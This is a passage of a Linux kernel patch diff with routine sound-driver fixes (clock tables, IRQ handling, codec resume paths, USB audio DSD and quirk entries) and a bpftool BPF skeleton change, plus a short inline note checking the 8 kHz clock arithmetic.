+@@ -163,11 +163,14 @@ struct atmel_i2s_gck_param {
+ 
+ #define I2S_MCK_12M288		12288000UL
+ #define I2S_MCK_11M2896		11289600UL
++#define I2S_MCK_6M144		6144000UL
+ 
+ /* mck = (32 * (imckfs+1) / (imckdiv+1)) * fs */
+ static const struct atmel_i2s_gck_param gck_params[] = {
++	/* mck = 6.144Mhz */
++	{  8000, I2S_MCK_6M144,  1, 47},	/* mck =  768 fs */
++
+ 	/* mck = 12.288MHz */
+-	{  8000, I2S_MCK_12M288, 0, 47},	/* mck = 1536 fs */
+ 	{ 16000, I2S_MCK_12M288, 1, 47},	/* mck =  768 fs */
+ 	{ 24000, I2S_MCK_12M288, 3, 63},	/* mck =  512 fs */
+ 	{ 32000, I2S_MCK_12M288, 3, 47},	/* mck =  384 fs */
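
(A quick arithmetic check of the new 8 kHz row, assuming the row layout {fs, gclk, imckdiv, imckfs} implied by the formula comment above: mck = 32 * (47+1) / (1+1) * 8000 Hz = 768 * 8000 Hz = 6,144,000 Hz, which is exactly I2S_MCK_6M144 and matches the "768 fs" annotation; the replaced row produced the same 8 kHz rate as 1536 * fs from the 12.288 MHz clock.)
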
+diff --git a/sound/soc/codecs/Kconfig b/sound/soc/codecs/Kconfig
+index 965ae55fa1607..0904827e2f3db 100644
+--- a/sound/soc/codecs/Kconfig
++++ b/sound/soc/codecs/Kconfig
+@@ -1552,6 +1552,7 @@ config SND_SOC_STA529
+ config SND_SOC_STAC9766
+ 	tristate
+ 	depends on SND_SOC_AC97_BUS
++	select REGMAP_AC97
+ 
+ config SND_SOC_STI_SAS
+ 	tristate "codec Audio support for STI SAS codec"
+diff --git a/sound/soc/codecs/cs43130.h b/sound/soc/codecs/cs43130.h
+index 1dd8936743132..90e8895275e77 100644
+--- a/sound/soc/codecs/cs43130.h
++++ b/sound/soc/codecs/cs43130.h
+@@ -381,88 +381,88 @@ struct cs43130_clk_gen {
+ 
+ /* frm_size = 16 */
+ static const struct cs43130_clk_gen cs43130_16_clk_gen[] = {
+-	{ 22579200,	32000,		.v = { 441,	10, }, },
+-	{ 22579200,	44100,		.v = { 32,	1, }, },
+-	{ 22579200,	48000,		.v = { 147,	5, }, },
+-	{ 22579200,	88200,		.v = { 16,	1, }, },
+-	{ 22579200,	96000,		.v = { 147,	10, }, },
+-	{ 22579200,	176400,		.v = { 8,	1, }, },
+-	{ 22579200,	192000,		.v = { 147,	20, }, },
+-	{ 22579200,	352800,		.v = { 4,	1, }, },
+-	{ 22579200,	384000,		.v = { 147,	40, }, },
+-	{ 24576000,	32000,		.v = { 48,	1, }, },
+-	{ 24576000,	44100,		.v = { 5120,	147, }, },
+-	{ 24576000,	48000,		.v = { 32,	1, }, },
+-	{ 24576000,	88200,		.v = { 2560,	147, }, },
+-	{ 24576000,	96000,		.v = { 16,	1, }, },
+-	{ 24576000,	176400,		.v = { 1280,	147, }, },
+-	{ 24576000,	192000,		.v = { 8,	1, }, },
+-	{ 24576000,	352800,		.v = { 640,	147, }, },
+-	{ 24576000,	384000,		.v = { 4,	1, }, },
++	{ 22579200,	32000,		.v = { 10,	441, }, },
++	{ 22579200,	44100,		.v = { 1,	32, }, },
++	{ 22579200,	48000,		.v = { 5,	147, }, },
++	{ 22579200,	88200,		.v = { 1,	16, }, },
++	{ 22579200,	96000,		.v = { 10,	147, }, },
++	{ 22579200,	176400,		.v = { 1,	8, }, },
++	{ 22579200,	192000,		.v = { 20,	147, }, },
++	{ 22579200,	352800,		.v = { 1,	4, }, },
++	{ 22579200,	384000,		.v = { 40,	147, }, },
++	{ 24576000,	32000,		.v = { 1,	48, }, },
++	{ 24576000,	44100,		.v = { 147,	5120, }, },
++	{ 24576000,	48000,		.v = { 1,	32, }, },
++	{ 24576000,	88200,		.v = { 147,	2560, }, },
++	{ 24576000,	96000,		.v = { 1,	16, }, },
++	{ 24576000,	176400,		.v = { 147,	1280, }, },
++	{ 24576000,	192000,		.v = { 1,	8, }, },
++	{ 24576000,	352800,		.v = { 147,	640, }, },
++	{ 24576000,	384000,		.v = { 1,	4, }, },
+ };
+ 
+ /* frm_size = 32 */
+ static const struct cs43130_clk_gen cs43130_32_clk_gen[] = {
+-	{ 22579200,	32000,		.v = { 441,	20, }, },
+-	{ 22579200,	44100,		.v = { 16,	1, }, },
+-	{ 22579200,	48000,		.v = { 147,	10, }, },
+-	{ 22579200,	88200,		.v = { 8,	1, }, },
+-	{ 22579200,	96000,		.v = { 147,	20, }, },
+-	{ 22579200,	176400,		.v = { 4,	1, }, },
+-	{ 22579200,	192000,		.v = { 147,	40, }, },
+-	{ 22579200,	352800,		.v = { 2,	1, }, },
+-	{ 22579200,	384000,		.v = { 147,	80, }, },
+-	{ 24576000,	32000,		.v = { 24,	1, }, },
+-	{ 24576000,	44100,		.v = { 2560,	147, }, },
+-	{ 24576000,	48000,		.v = { 16,	1, }, },
+-	{ 24576000,	88200,		.v = { 1280,	147, }, },
+-	{ 24576000,	96000,		.v = { 8,	1, }, },
+-	{ 24576000,	176400,		.v = { 640,	147, }, },
+-	{ 24576000,	192000,		.v = { 4,	1, }, },
+-	{ 24576000,	352800,		.v = { 320,	147, }, },
+-	{ 24576000,	384000,		.v = { 2,	1, }, },
++	{ 22579200,	32000,		.v = { 20,	441, }, },
++	{ 22579200,	44100,		.v = { 1,	16, }, },
++	{ 22579200,	48000,		.v = { 10,	147, }, },
++	{ 22579200,	88200,		.v = { 1,	8, }, },
++	{ 22579200,	96000,		.v = { 20,	147, }, },
++	{ 22579200,	176400,		.v = { 1,	4, }, },
++	{ 22579200,	192000,		.v = { 40,	147, }, },
++	{ 22579200,	352800,		.v = { 1,	2, }, },
++	{ 22579200,	384000,		.v = { 80,	147, }, },
++	{ 24576000,	32000,		.v = { 1,	24, }, },
++	{ 24576000,	44100,		.v = { 147,	2560, }, },
++	{ 24576000,	48000,		.v = { 1,	16, }, },
++	{ 24576000,	88200,		.v = { 147,	1280, }, },
++	{ 24576000,	96000,		.v = { 1,	8, }, },
++	{ 24576000,	176400,		.v = { 147,	640, }, },
++	{ 24576000,	192000,		.v = { 1,	4, }, },
++	{ 24576000,	352800,		.v = { 147,	320, }, },
++	{ 24576000,	384000,		.v = { 1,	2, }, },
+ };
+ 
+ /* frm_size = 48 */
+ static const struct cs43130_clk_gen cs43130_48_clk_gen[] = {
+-	{ 22579200,	32000,		.v = { 147,	100, }, },
+-	{ 22579200,	44100,		.v = { 32,	3, }, },
+-	{ 22579200,	48000,		.v = { 49,	5, }, },
+-	{ 22579200,	88200,		.v = { 16,	3, }, },
+-	{ 22579200,	96000,		.v = { 49,	10, }, },
+-	{ 22579200,	176400,		.v = { 8,	3, }, },
+-	{ 22579200,	192000,		.v = { 49,	20, }, },
+-	{ 22579200,	352800,		.v = { 4,	3, }, },
+-	{ 22579200,	384000,		.v = { 49,	40, }, },
+-	{ 24576000,	32000,		.v = { 16,	1, }, },
+-	{ 24576000,	44100,		.v = { 5120,	441, }, },
+-	{ 24576000,	48000,		.v = { 32,	3, }, },
+-	{ 24576000,	88200,		.v = { 2560,	441, }, },
+-	{ 24576000,	96000,		.v = { 16,	3, }, },
+-	{ 24576000,	176400,		.v = { 1280,	441, }, },
+-	{ 24576000,	192000,		.v = { 8,	3, }, },
+-	{ 24576000,	352800,		.v = { 640,	441, }, },
+-	{ 24576000,	384000,		.v = { 4,	3, }, },
++	{ 22579200,	32000,		.v = { 100,	147, }, },
++	{ 22579200,	44100,		.v = { 3,	32, }, },
++	{ 22579200,	48000,		.v = { 5,	49, }, },
++	{ 22579200,	88200,		.v = { 3,	16, }, },
++	{ 22579200,	96000,		.v = { 10,	49, }, },
++	{ 22579200,	176400,		.v = { 3,	8, }, },
++	{ 22579200,	192000,		.v = { 20,	49, }, },
++	{ 22579200,	352800,		.v = { 3,	4, }, },
++	{ 22579200,	384000,		.v = { 40,	49, }, },
++	{ 24576000,	32000,		.v = { 1,	16, }, },
++	{ 24576000,	44100,		.v = { 441,	5120, }, },
++	{ 24576000,	48000,		.v = { 3,	32, }, },
++	{ 24576000,	88200,		.v = { 441,	2560, }, },
++	{ 24576000,	96000,		.v = { 3,	16, }, },
++	{ 24576000,	176400,		.v = { 441,	1280, }, },
++	{ 24576000,	192000,		.v = { 3,	8, }, },
++	{ 24576000,	352800,		.v = { 441,	640, }, },
++	{ 24576000,	384000,		.v = { 3,	4, }, },
+ };
+ 
+ /* frm_size = 64 */
+ static const struct cs43130_clk_gen cs43130_64_clk_gen[] = {
+-	{ 22579200,	32000,		.v = { 441,	40, }, },
+-	{ 22579200,	44100,		.v = { 8,	1, }, },
+-	{ 22579200,	48000,		.v = { 147,	20, }, },
+-	{ 22579200,	88200,		.v = { 4,	1, }, },
+-	{ 22579200,	96000,		.v = { 147,	40, }, },
+-	{ 22579200,	176400,		.v = { 2,	1, }, },
+-	{ 22579200,	192000,		.v = { 147,	80, }, },
++	{ 22579200,	32000,		.v = { 40,	441, }, },
++	{ 22579200,	44100,		.v = { 1,	8, }, },
++	{ 22579200,	48000,		.v = { 20,	147, }, },
++	{ 22579200,	88200,		.v = { 1,	4, }, },
++	{ 22579200,	96000,		.v = { 40,	147, }, },
++	{ 22579200,	176400,		.v = { 1,	2, }, },
++	{ 22579200,	192000,		.v = { 80,	147, }, },
+ 	{ 22579200,	352800,		.v = { 1,	1, }, },
+-	{ 24576000,	32000,		.v = { 12,	1, }, },
+-	{ 24576000,	44100,		.v = { 1280,	147, }, },
+-	{ 24576000,	48000,		.v = { 8,	1, }, },
+-	{ 24576000,	88200,		.v = { 640,	147, }, },
+-	{ 24576000,	96000,		.v = { 4,	1, }, },
+-	{ 24576000,	176400,		.v = { 320,	147, }, },
+-	{ 24576000,	192000,		.v = { 2,	1, }, },
+-	{ 24576000,	352800,		.v = { 160,	147, }, },
++	{ 24576000,	32000,		.v = { 1,	12, }, },
++	{ 24576000,	44100,		.v = { 147,	1280, }, },
++	{ 24576000,	48000,		.v = { 1,	8, }, },
++	{ 24576000,	88200,		.v = { 147,	640, }, },
++	{ 24576000,	96000,		.v = { 1,	4, }, },
++	{ 24576000,	176400,		.v = { 147,	320, }, },
++	{ 24576000,	192000,		.v = { 1,	2, }, },
++	{ 24576000,	352800,		.v = { 147,	160, }, },
+ 	{ 24576000,	384000,		.v = { 1,	1, }, },
+ };
+ 
+diff --git a/sound/soc/codecs/da7219-aad.c b/sound/soc/codecs/da7219-aad.c
+index bba73c44c219f..9251490548e8c 100644
+--- a/sound/soc/codecs/da7219-aad.c
++++ b/sound/soc/codecs/da7219-aad.c
+@@ -353,11 +353,15 @@ static irqreturn_t da7219_aad_irq_thread(int irq, void *data)
+ 	struct da7219_priv *da7219 = snd_soc_component_get_drvdata(component);
+ 	u8 events[DA7219_AAD_IRQ_REG_MAX];
+ 	u8 statusa;
+-	int i, report = 0, mask = 0;
++	int i, ret, report = 0, mask = 0;
+ 
+ 	/* Read current IRQ events */
+-	regmap_bulk_read(da7219->regmap, DA7219_ACCDET_IRQ_EVENT_A,
+-			 events, DA7219_AAD_IRQ_REG_MAX);
++	ret = regmap_bulk_read(da7219->regmap, DA7219_ACCDET_IRQ_EVENT_A,
++			       events, DA7219_AAD_IRQ_REG_MAX);
++	if (ret) {
++		dev_warn_ratelimited(component->dev, "Failed to read IRQ events: %d\n", ret);
++		return IRQ_NONE;
++	}
+ 
+ 	if (!events[DA7219_AAD_IRQ_REG_A] && !events[DA7219_AAD_IRQ_REG_B])
+ 		return IRQ_NONE;
+@@ -863,6 +867,8 @@ void da7219_aad_suspend(struct snd_soc_component *component)
+ 			}
+ 		}
+ 	}
++
++	synchronize_irq(da7219_aad->irq);
+ }
+ 
+ void da7219_aad_resume(struct snd_soc_component *component)
+diff --git a/sound/soc/codecs/es8316.c b/sound/soc/codecs/es8316.c
+index 87775378362e7..c4e4ab93fdb6d 100644
+--- a/sound/soc/codecs/es8316.c
++++ b/sound/soc/codecs/es8316.c
+@@ -153,7 +153,7 @@ static const char * const es8316_dmic_txt[] = {
+ 		"dmic data at high level",
+ 		"dmic data at low level",
+ };
+-static const unsigned int es8316_dmic_values[] = { 0, 1, 2 };
++static const unsigned int es8316_dmic_values[] = { 0, 2, 3 };
+ static const struct soc_enum es8316_dmic_src_enum =
+ 	SOC_VALUE_ENUM_SINGLE(ES8316_ADC_DMIC, 0, 3,
+ 			      ARRAY_SIZE(es8316_dmic_txt),
+diff --git a/sound/soc/codecs/nau8821.c b/sound/soc/codecs/nau8821.c
+index 4a72b94e84104..efd92656a060d 100644
+--- a/sound/soc/codecs/nau8821.c
++++ b/sound/soc/codecs/nau8821.c
+@@ -10,6 +10,7 @@
+ #include <linux/acpi.h>
+ #include <linux/clk.h>
+ #include <linux/delay.h>
++#include <linux/dmi.h>
+ #include <linux/init.h>
+ #include <linux/i2c.h>
+ #include <linux/module.h>
+@@ -25,6 +26,13 @@
+ #include <sound/tlv.h>
+ #include "nau8821.h"
+ 
++#define NAU8821_JD_ACTIVE_HIGH			BIT(0)
++
++static int nau8821_quirk;
++static int quirk_override = -1;
++module_param_named(quirk, quirk_override, uint, 0444);
++MODULE_PARM_DESC(quirk, "Board-specific quirk override");
++
+ #define NAU_FREF_MAX 13500000
+ #define NAU_FVCO_MAX 100000000
+ #define NAU_FVCO_MIN 90000000
+@@ -1696,6 +1704,33 @@ static int nau8821_setup_irq(struct nau8821 *nau8821)
+ 	return 0;
+ }
+ 
++/* Please keep this list alphabetically sorted */
++static const struct dmi_system_id nau8821_quirk_table[] = {
++	{
++		/* Positivo CW14Q01P-V2 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Positivo Tecnologia SA"),
++			DMI_MATCH(DMI_BOARD_NAME, "CW14Q01P-V2"),
++		},
++		.driver_data = (void *)(NAU8821_JD_ACTIVE_HIGH),
++	},
++	{}
++};
++
++static void nau8821_check_quirks(void)
++{
++	const struct dmi_system_id *dmi_id;
++
++	if (quirk_override != -1) {
++		nau8821_quirk = quirk_override;
++		return;
++	}
++
++	dmi_id = dmi_first_match(nau8821_quirk_table);
++	if (dmi_id)
++		nau8821_quirk = (unsigned long)dmi_id->driver_data;
++}
++
+ static int nau8821_i2c_probe(struct i2c_client *i2c)
+ {
+ 	struct device *dev = &i2c->dev;
+@@ -1716,6 +1751,12 @@ static int nau8821_i2c_probe(struct i2c_client *i2c)
+ 
+ 	nau8821->dev = dev;
+ 	nau8821->irq = i2c->irq;
++
++	nau8821_check_quirks();
++
++	if (nau8821_quirk & NAU8821_JD_ACTIVE_HIGH)
++		nau8821->jkdet_polarity = 0;
++
+ 	nau8821_print_device_properties(nau8821);
+ 
+ 	nau8821_reset_chip(nau8821->regmap);
+diff --git a/sound/soc/codecs/rt5682-sdw.c b/sound/soc/codecs/rt5682-sdw.c
+index c1a94229dc7e3..868a61c8b0608 100644
+--- a/sound/soc/codecs/rt5682-sdw.c
++++ b/sound/soc/codecs/rt5682-sdw.c
+@@ -786,8 +786,15 @@ static int __maybe_unused rt5682_dev_resume(struct device *dev)
+ 	if (!rt5682->first_hw_init)
+ 		return 0;
+ 
+-	if (!slave->unattach_request)
++	if (!slave->unattach_request) {
++		if (rt5682->disable_irq == true) {
++			mutex_lock(&rt5682->disable_irq_lock);
++			sdw_write_no_pm(slave, SDW_SCP_INTMASK1, SDW_SCP_INT1_IMPL_DEF);
++			rt5682->disable_irq = false;
++			mutex_unlock(&rt5682->disable_irq_lock);
++		}
+ 		goto regmap_sync;
++	}
+ 
+ 	time = wait_for_completion_timeout(&slave->initialization_complete,
+ 				msecs_to_jiffies(RT5682_PROBE_TIMEOUT));
+diff --git a/sound/soc/codecs/rt711-sdca-sdw.c b/sound/soc/codecs/rt711-sdca-sdw.c
+index e23cec4c457de..487d3010ddc19 100644
+--- a/sound/soc/codecs/rt711-sdca-sdw.c
++++ b/sound/soc/codecs/rt711-sdca-sdw.c
+@@ -442,8 +442,16 @@ static int __maybe_unused rt711_sdca_dev_resume(struct device *dev)
+ 	if (!rt711->first_hw_init)
+ 		return 0;
+ 
+-	if (!slave->unattach_request)
++	if (!slave->unattach_request) {
++		if (rt711->disable_irq == true) {
++			mutex_lock(&rt711->disable_irq_lock);
++			sdw_write_no_pm(slave, SDW_SCP_SDCA_INTMASK1, SDW_SCP_SDCA_INTMASK_SDCA_0);
++			sdw_write_no_pm(slave, SDW_SCP_SDCA_INTMASK2, SDW_SCP_SDCA_INTMASK_SDCA_8);
++			rt711->disable_irq = false;
++			mutex_unlock(&rt711->disable_irq_lock);
++		}
+ 		goto regmap_sync;
++	}
+ 
+ 	time = wait_for_completion_timeout(&slave->initialization_complete,
+ 				msecs_to_jiffies(RT711_PROBE_TIMEOUT));
+diff --git a/sound/soc/codecs/rt711-sdw.c b/sound/soc/codecs/rt711-sdw.c
+index 4fe68bcf2a7c2..9545b8a7eb192 100644
+--- a/sound/soc/codecs/rt711-sdw.c
++++ b/sound/soc/codecs/rt711-sdw.c
+@@ -541,8 +541,15 @@ static int __maybe_unused rt711_dev_resume(struct device *dev)
+ 	if (!rt711->first_hw_init)
+ 		return 0;
+ 
+-	if (!slave->unattach_request)
++	if (!slave->unattach_request) {
++		if (rt711->disable_irq == true) {
++			mutex_lock(&rt711->disable_irq_lock);
++			sdw_write_no_pm(slave, SDW_SCP_INTMASK1, SDW_SCP_INT1_IMPL_DEF);
++			rt711->disable_irq = false;
++			mutex_unlock(&rt711->disable_irq_lock);
++		}
+ 		goto regmap_sync;
++	}
+ 
+ 	time = wait_for_completion_timeout(&slave->initialization_complete,
+ 				msecs_to_jiffies(RT711_PROBE_TIMEOUT));
+diff --git a/sound/soc/sof/amd/acp.c b/sound/soc/sof/amd/acp.c
+index 8afd67ba1e5a3..f8d2372a758f4 100644
+--- a/sound/soc/sof/amd/acp.c
++++ b/sound/soc/sof/amd/acp.c
+@@ -349,9 +349,9 @@ static irqreturn_t acp_irq_handler(int irq, void *dev_id)
+ 	unsigned int val;
+ 
+ 	val = snd_sof_dsp_read(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET);
+-	if (val) {
+-		val |= ACP_DSP_TO_HOST_IRQ;
+-		snd_sof_dsp_write(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET, val);
++	if (val & ACP_DSP_TO_HOST_IRQ) {
++		snd_sof_dsp_write(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET,
++				  ACP_DSP_TO_HOST_IRQ);
+ 		return IRQ_WAKE_THREAD;
+ 	}
+ 
+diff --git a/sound/usb/mixer_maps.c b/sound/usb/mixer_maps.c
+index f4bd1e8ae4b6c..23260aa1919d3 100644
+--- a/sound/usb/mixer_maps.c
++++ b/sound/usb/mixer_maps.c
+@@ -374,6 +374,15 @@ static const struct usbmix_name_map corsair_virtuoso_map[] = {
+ 	{ 0 }
+ };
+ 
++/* Microsoft USB Link headset */
++/* a guess work: raw playback volume values are from 2 to 129 */
++static const struct usbmix_dB_map ms_usb_link_dB = { -3225, 0, true };
++static const struct usbmix_name_map ms_usb_link_map[] = {
++	{ 9, NULL, .dB = &ms_usb_link_dB },
++	{ 10, NULL }, /* Headset Capture volume; seems non-working, disabled */
++	{ 0 }   /* terminator */
++};
++
+ /* ASUS ROG Zenith II with Realtek ALC1220-VB */
+ static const struct usbmix_name_map asus_zenith_ii_map[] = {
+ 	{ 19, NULL, 12 }, /* FU, Input Gain Pad - broken response, disabled */
+@@ -668,6 +677,11 @@ static const struct usbmix_ctl_map usbmix_ctl_maps[] = {
+ 		.id = USB_ID(0x1395, 0x0025),
+ 		.map = sennheiser_pc8_map,
+ 	},
++	{
++		/* Microsoft USB Link headset */
++		.id = USB_ID(0x045e, 0x083c),
++		.map = ms_usb_link_map,
++	},
+ 	{ 0 } /* terminator */
+ };
+ 
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 6cf55b7f7a041..4667d543f7481 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -1874,8 +1874,10 @@ u64 snd_usb_interface_dsd_format_quirks(struct snd_usb_audio *chip,
+ 
+ 	/* XMOS based USB DACs */
+ 	switch (chip->usb_id) {
+-	case USB_ID(0x1511, 0x0037): /* AURALiC VEGA */
+-	case USB_ID(0x21ed, 0xd75a): /* Accuphase DAC-60 option card */
++	case USB_ID(0x139f, 0x5504): /* Nagra DAC */
++	case USB_ID(0x20b1, 0x3089): /* Mola-Mola DAC */
++	case USB_ID(0x2522, 0x0007): /* LH Labs Geek Out 1V5 */
++	case USB_ID(0x2522, 0x0009): /* LH Labs Geek Pulse X Inifinity 2V0 */
+ 	case USB_ID(0x2522, 0x0012): /* LH Labs VI DAC Infinity */
+ 	case USB_ID(0x2772, 0x0230): /* Pro-Ject Pre Box S2 Digital */
+ 		if (fp->altsetting == 2)
+@@ -1885,14 +1887,18 @@ u64 snd_usb_interface_dsd_format_quirks(struct snd_usb_audio *chip,
+ 	case USB_ID(0x0d8c, 0x0316): /* Hegel HD12 DSD */
+ 	case USB_ID(0x10cb, 0x0103): /* The Bit Opus #3; with fp->dsd_raw */
+ 	case USB_ID(0x16d0, 0x06b2): /* NuPrime DAC-10 */
+-	case USB_ID(0x16d0, 0x09dd): /* Encore mDSD */
++	case USB_ID(0x16d0, 0x06b4): /* NuPrime Audio HD-AVP/AVA */
+ 	case USB_ID(0x16d0, 0x0733): /* Furutech ADL Stratos */
++	case USB_ID(0x16d0, 0x09d8): /* NuPrime IDA-8 */
+ 	case USB_ID(0x16d0, 0x09db): /* NuPrime Audio DAC-9 */
++	case USB_ID(0x16d0, 0x09dd): /* Encore mDSD */
+ 	case USB_ID(0x1db5, 0x0003): /* Bryston BDA3 */
++	case USB_ID(0x20a0, 0x4143): /* WaveIO USB Audio 2.0 */
+ 	case USB_ID(0x22e1, 0xca01): /* HDTA Serenade DSD */
+ 	case USB_ID(0x249c, 0x9326): /* M2Tech Young MkIII */
+ 	case USB_ID(0x2616, 0x0106): /* PS Audio NuWave DAC */
+ 	case USB_ID(0x2622, 0x0041): /* Audiolab M-DAC+ */
++	case USB_ID(0x278b, 0x5100): /* Rotel RC-1590 */
+ 	case USB_ID(0x27f7, 0x3002): /* W4S DAC-2v2SE */
+ 	case USB_ID(0x29a2, 0x0086): /* Mutec MC3+ USB */
+ 	case USB_ID(0x6b42, 0x0042): /* MSB Technology */
+@@ -1902,9 +1908,6 @@ u64 snd_usb_interface_dsd_format_quirks(struct snd_usb_audio *chip,
+ 
+ 	/* Amanero Combo384 USB based DACs with native DSD support */
+ 	case USB_ID(0x16d0, 0x071a):  /* Amanero - Combo384 */
+-	case USB_ID(0x2ab6, 0x0004):  /* T+A DAC8DSD-V2.0, MP1000E-V2.0, MP2000R-V2.0, MP2500R-V2.0, MP3100HV-V2.0 */
+-	case USB_ID(0x2ab6, 0x0005):  /* T+A USB HD Audio 1 */
+-	case USB_ID(0x2ab6, 0x0006):  /* T+A USB HD Audio 2 */
+ 		if (fp->altsetting == 2) {
+ 			switch (le16_to_cpu(chip->dev->descriptor.bcdDevice)) {
+ 			case 0x199:
+@@ -2011,6 +2014,9 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x041e, 0x4080, /* Creative Live Cam VF0610 */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x045e, 0x083c, /* MS USB Link headset */
++		   QUIRK_FLAG_GET_SAMPLE_RATE | QUIRK_FLAG_CTL_MSG_DELAY |
++		   QUIRK_FLAG_DISABLE_AUTOSUSPEND),
+ 	DEVICE_FLG(0x046d, 0x084c, /* Logitech ConferenceCam Connect */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE | QUIRK_FLAG_CTL_MSG_DELAY_1M),
+ 	DEVICE_FLG(0x046d, 0x0991, /* Logitech QuickCam Pro */
+@@ -2046,6 +2052,9 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_IFACE_DELAY),
+ 	DEVICE_FLG(0x0644, 0x805f, /* TEAC Model 12 */
+ 		   QUIRK_FLAG_FORCE_IFACE_RESET),
++	DEVICE_FLG(0x0644, 0x806b, /* TEAC UD-701 */
++		   QUIRK_FLAG_ITF_USB_DSD_DAC | QUIRK_FLAG_CTL_MSG_DELAY |
++		   QUIRK_FLAG_IFACE_DELAY),
+ 	DEVICE_FLG(0x06f8, 0xb000, /* Hercules DJ Console (Windows Edition) */
+ 		   QUIRK_FLAG_IGNORE_CTL_ERROR),
+ 	DEVICE_FLG(0x06f8, 0xd002, /* Hercules DJ Console (Macintosh Edition) */
+@@ -2084,6 +2093,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_ITF_USB_DSD_DAC | QUIRK_FLAG_CTL_MSG_DELAY),
+ 	DEVICE_FLG(0x154e, 0x3006, /* Marantz SA-14S1 */
+ 		   QUIRK_FLAG_ITF_USB_DSD_DAC | QUIRK_FLAG_CTL_MSG_DELAY),
++	DEVICE_FLG(0x154e, 0x300b, /* Marantz SA-KI RUBY / SA-12 */
++		   QUIRK_FLAG_DSD_RAW),
+ 	DEVICE_FLG(0x154e, 0x500e, /* Denon DN-X1600 */
+ 		   QUIRK_FLAG_IGNORE_CLOCK_SOURCE),
+ 	DEVICE_FLG(0x1686, 0x00dd, /* Zoom R16/24 */
+@@ -2128,6 +2139,10 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_SHARE_MEDIA_DEVICE | QUIRK_FLAG_ALIGN_TRANSFER),
+ 	DEVICE_FLG(0x21b4, 0x0081, /* AudioQuest DragonFly */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
++	DEVICE_FLG(0x21b4, 0x0230, /* Ayre QB-9 Twenty */
++		   QUIRK_FLAG_DSD_RAW),
++	DEVICE_FLG(0x21b4, 0x0232, /* Ayre QX-5 Twenty */
++		   QUIRK_FLAG_DSD_RAW),
+ 	DEVICE_FLG(0x2522, 0x0007, /* LH Labs Geek Out HD Audio 1V5 */
+ 		   QUIRK_FLAG_SET_IFACE_FIRST),
+ 	DEVICE_FLG(0x2708, 0x0002, /* Audient iD14 */
+@@ -2170,12 +2185,18 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_VALIDATE_RATES),
+ 	VENDOR_FLG(0x1235, /* Focusrite Novation */
+ 		   QUIRK_FLAG_VALIDATE_RATES),
++	VENDOR_FLG(0x1511, /* AURALiC */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x152a, /* Thesycon devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x18d1, /* iBasso devices */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x1de7, /* Phoenix Audio */
+ 		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 	VENDOR_FLG(0x20b1, /* XMOS based devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x21ed, /* Accuphase Laboratory */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x22d9, /* Oppo */
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x23ba, /* Playback Design */
+@@ -2191,10 +2212,14 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x2ab6, /* T+A devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x2d87, /* Cayin device */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3336, /* HEM devices */
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3353, /* Khadas devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x35f4, /* MSB Technology */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3842, /* EVGA */
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0xc502, /* HiBy devices */
+diff --git a/tools/bpf/bpftool/skeleton/pid_iter.bpf.c b/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
+index eb05ea53afb12..26004f0c5a6ae 100644
+--- a/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
++++ b/tools/bpf/bpftool/skeleton/pid_iter.bpf.c
+@@ -15,6 +15,19 @@ enum bpf_obj_type {
+ 	BPF_OBJ_BTF,
+ };
+ 
++struct bpf_perf_link___local {
++	struct bpf_link link;
++	struct file *perf_file;
++} __attribute__((preserve_access_index));
++
++struct perf_event___local {
++	u64 bpf_cookie;
++} __attribute__((preserve_access_index));
++
++enum bpf_link_type___local {
++	BPF_LINK_TYPE_PERF_EVENT___local = 7,
++};
++
+ extern const void bpf_link_fops __ksym;
+ extern const void bpf_map_fops __ksym;
+ extern const void bpf_prog_fops __ksym;
+@@ -41,10 +54,10 @@ static __always_inline __u32 get_obj_id(void *ent, enum bpf_obj_type type)
+ /* could be used only with BPF_LINK_TYPE_PERF_EVENT links */
+ static __u64 get_bpf_cookie(struct bpf_link *link)
+ {
+-	struct bpf_perf_link *perf_link;
+-	struct perf_event *event;
++	struct bpf_perf_link___local *perf_link;
++	struct perf_event___local *event;
+ 
+-	perf_link = container_of(link, struct bpf_perf_link, link);
++	perf_link = container_of(link, struct bpf_perf_link___local, link);
+ 	event = BPF_CORE_READ(perf_link, perf_file, private_data);
+ 	return BPF_CORE_READ(event, bpf_cookie);
+ }
+@@ -84,10 +97,13 @@ int iter(struct bpf_iter__task_file *ctx)
